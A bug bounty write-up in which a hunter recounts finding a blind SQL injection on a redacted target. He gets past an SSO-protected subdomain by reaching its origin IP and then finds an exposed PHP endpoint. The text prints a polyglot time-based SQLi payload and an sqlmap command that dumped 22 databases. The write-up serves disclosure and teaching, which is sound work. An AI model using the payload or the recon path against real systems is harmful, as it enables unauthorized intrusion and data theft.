Hi, I'm mrx_w_ (Adem Ziane Berroudja), a bug bounty hunter on Bugcrowd. You can find me on Twitter and LinkedIn under mrx_w_. In this write-up, I'll share how I discovered a blind SQL injection vulnerability on a target I'll refer to as redacted.com, starting from a restricted subdomain and pivoting through exposed infrastructure.
Our target was a private program on Bugcrowd with a wildcard scope of *.redacted.com.
The first thing I usually do when working with a wildcard scope is subdomain enumeration. I used a combination of tools and techniques such as:
- Subfinder
- Amass
- Google dorking
- SecurityTrails
After collecting a list of subdomains, I filtered the live ones and started testing them one by one.
During this process, I came across the following subdomain:
https://ci-portal.redacted.redacted.com/
When accessing it, I was presented with an SSO login page, which initially limited further interaction with the application.
I tried several methods to bypass the SSO and access the subdomain content directly, but none of them were successful.
I then decided to investigate the infrastructure behind the subdomain. Using SecurityTrails, I looked up the DNS records for the subdomain and was able to identify its origin IP address :
As you can see, the lookup returned two IP addresses. I started by accessing the first one, 3.*.*.*.
When opening the IP, I was presented with a default homepage containing several links to different parts of the application. While exploring these, I discovered the following endpoint:
/email-asset-editor/ajax/saveChanges.php
By accessing this endpoint i got the following editor page :
When I entered a random value in the "enter filename" field, I observed a POST request containing three parameters: asset_id, html_content, and json_attributes.
The first thing that came to mind was to test for SQL injection, especially since the application is built using PHP.
I used a time-based payload that I had saw Orwa Atyat using it :
(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/I injected this payload into the asset_id parameter and i did got a 10 Sec delay :
After confirming that the asset_id parameter was vulnerable to SQL injection, I saved the request into a file (sqli.txt) .
I then used sqlmap to dump the databases with the following command:
sqlmap -r sqli.txt --dbsThis resulted in the successful extraction of 22 databases without any issues, confirming the severity and impact of the vulnerability.
After that, I prepared a full report including all the required requests to reproduce the issue, along with a clear proof of concept. The vulnerability was later validated as a P1 and rewarded accordingly.
